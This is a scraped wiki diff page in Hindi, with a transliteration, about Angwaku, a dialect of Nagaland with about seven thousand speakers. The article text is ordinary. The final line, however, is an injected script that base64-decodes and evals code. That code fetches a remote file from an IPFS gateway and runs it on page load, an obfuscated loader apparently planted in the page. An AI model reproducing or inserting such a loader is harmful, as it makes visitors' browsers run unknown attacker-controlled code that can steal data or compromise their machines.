Difference between revisions of "अंगवाकू"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "khoj.bharatdiscovery.org" to "bharatkhoj.org")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
'''अंगवाकू''' [[भारत]] के [[नागालैंड]] में बोली जाने वाली चीनी भाषा परिवार के असमी-बर्मी-उपवर्ग की पूर्वी शाखा की भाषाओं या बोलियों (अंगवाक्‌, तम्ल्‌, बनपरा, मूतोनिआ, मोहोगिया, नमसंगिया, चांग, अस्सिरिंगिया, मोशांग, शांग्गे) में से एक प्रमुख बोली होती है, जिसके बोलने वालों की<ref>इसमें तम्ल्‌ बोलने वालों को भी शामिल किया जाता है।</ref> संख्या अनुमानत: सात हजार है। इसे पूर्वी नागा भाषा भी कहते हैं। इस [[भाषा]] को [[रोमन लिपि|रोमन]] या [[नागरी लिपि]] में अभी लिखित रूप नहीं दिया जा सका है।<ref>{{cite web |url=http://khoj.bharatdiscovery.org/india/%E0%A4%85%E0%A4%82%E0%A4%97%E0%A4%B5%E0%A4%BE%E0%A4%95%E0%A5%82 |title=अंगवाकू|accessmonthday=11 जून |accessyear=2013 |last= |first= |authorlink= |format= |publisher=भारतखोज |language=हिंदी }} </ref>
+
'''अंगवाकू''' [[भारत]] के [[नागालैंड]] में बोली जाने वाली चीनी भाषा परिवार के असमी-बर्मी-उपवर्ग की पूर्वी शाखा की भाषाओं या बोलियों में से एक है।
  
 +
*चीनी भाषा परिवार के असमी-बर्मी-उपवर्ग की पूर्वी शाखा की भाषाओं या बोलियों में 'अंगवाकू', 'तम्ल्‌', 'बनपरा', 'मूतोनिआ', 'मोहोगिया', 'नमसंगिया', 'चांग', 'अस्सिरिंगिया', 'मोशांग', 'शांग्गे' आती हैं।
 +
*उपरोक्त भाषाओं या बोलियों के बोलने वालों की<ref>इसमें तम्ल्‌ बोलने वालों को भी शामिल किया जाता है।</ref> संख्या अनुमानत: सात हज़ार है।
 +
*अंगवाकू को पूर्वी नागा भाषा भी कहते हैं।
 +
*इस [[भाषा]] को [[रोमन लिपि|रोमन]] या [[नागरी लिपि]] में अभी लिखित रूप नहीं दिया जा सका है।<ref>{{cite web |url=http://bharatkhoj.org/india/%E0%A4%85%E0%A4%82%E0%A4%97%E0%A4%B5%E0%A4%BE%E0%A4%95%E0%A5%82|title=अंगवाकू|accessmonthday=11 जून |accessyear=2013 |last= |first= |authorlink= |format= |publisher=भारतखोज |language=हिंदी }} </ref>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भाषा और लिपि}}
 
{{भाषा और लिपि}}
[[Category:भाषा और लिपि]]
+
[[Category:भाषा और लिपि]][[Category:साहित्य_कोश]][[Category:नागालैंड]][[Category:भाषा कोश]][[Category:हिन्दी विश्वकोश]]
[[Category:साहित्य_कोश]][[Category:नागालैंड]][[Category:भाषा कोश]]
 
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 12:30, 25 October 2017

aangavakoo bharat ke nagalaiand mean boli jane vali chini bhasha parivar ke asami-barmi-upavarg ki poorvi shakha ki bhashaoan ya boliyoan mean se ek hai.

  • chini bhasha parivar ke asami-barmi-upavarg ki poorvi shakha ki bhashaoan ya boliyoan mean 'aangavakoo', 'tamlh‌', 'banapara', 'mootonia', 'mohogiya', 'namasangiya', 'chaang', 'assiriangiya', 'moshaang', 'shaangge' ati haian.
  • uparokt bhashaoan ya boliyoan ke bolane valoan ki[1] sankhya anumanat: sat hazar hai.
  • aangavakoo ko poorvi naga bhasha bhi kahate haian.
  • is bhasha ko roman ya nagari lipi mean abhi likhit roop nahian diya ja saka hai.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. isamean tamlh‌ bolane valoan ko bhi shamil kiya jata hai.
  2. aangavakoo (hiandi) bharatakhoj. abhigaman tithi: 11 joon, 2013.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>